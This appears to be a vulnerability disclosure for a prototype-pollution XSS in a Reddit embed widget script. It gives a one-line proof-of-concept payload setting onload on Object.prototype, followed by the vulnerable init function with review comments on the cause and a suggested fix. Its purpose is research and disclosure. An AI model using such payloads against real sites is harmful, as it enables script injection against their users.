- The payload that triggers the XSS (it sets an `onload` property on `Object.prototype`, i.e. prototype pollution) is:
__proto__[onload]=alert(1)
Vulnerable code (file: http://embed.redditmedia.com/widgets/platform.js):
/**
 * Set up a card instance: record the target element and options, build the
 * frame, register the load/extract/media callbacks, then wrap the frame in
 * two <div>s and insert the wrapper into the DOM in front of `b`.
 *
 * @param a - forwarded to m.build() as its third argument.
 * @param b - element stored as this.elem; the wrapper is inserted before it.
 * @param c - options object; `c.url` must be truthy, `c.embed` is optional.
 * @param d - stored as this._done.
 * @returns {boolean|undefined} false when `c.url` is falsy (this.error is
 *     set and this.frame is null); otherwise nothing is returned.
 */
n.prototype.init = function(a, b, c, d) {
    this.elem = b;
    this.options = c;

    // Without a URL there is nothing to build: flag the error and stop.
    if (!c.url) {
        this.error = true;
        this.frame = null;
        return false;
    }

    this.error = false;
    // NOTE(review): the payload on this page adds `onload` to
    // Object.prototype, so every plain object (including `c` and the
    // attribute maps passed to f.create below) inherits it. If m.build or
    // f.create copies properties with an unfiltered for...in (not visible in
    // this excerpt, confirm), the inherited key ends up as an element
    // attribute. The fix belongs in those helpers: enumerate own keys only
    // (Object.keys / hasOwnProperty) and allowlist attribute names.
    this.frame = m.build(b, c, a);
    this._done = d;

    var pending = new i();
    var onCardLoad = pending.callback();

    this.frame.one("card.load", function(iframe, doc) {
        onCardLoad({
            iframe: iframe,
            doc: doc
        });
    });

    this._extract = pending.callback();

    // extract() forwards to _extract at most once; later calls return false.
    this.extract = e.bind(function(data) {
        if (this.extracted) {
            return false;
        }
        this.extracted = true;
        this._extract(data);
    }, this);

    if (c.embed) {
        this.media = pending.callback();
    }

    // Size the frame to its container, capped at 600px.
    var parent = b.parentNode;
    if (parent && parent.offsetWidth) {
        if (parent.offsetWidth > 600) {
            this.frame.elem.style.width = "600px";
        } else {
            this.frame.elem.style.width = parent.offsetWidth + "px";
        }
    }

    var card = f.create("div", {
        "class": "embedly-card"
    });
    var hug = f.create("div", {
        "class": "embedly-card-hug"
    });

    card.appendChild(hug);
    hug.appendChild(this.frame.elem);
    // NOTE(review): `parent` is null-checked for the width logic above but
    // dereferenced unconditionally here; a detached `b` would throw.
    parent.insertBefore(card, b);
    this.frame.__appended();
    pending.wait(this.done, this);
};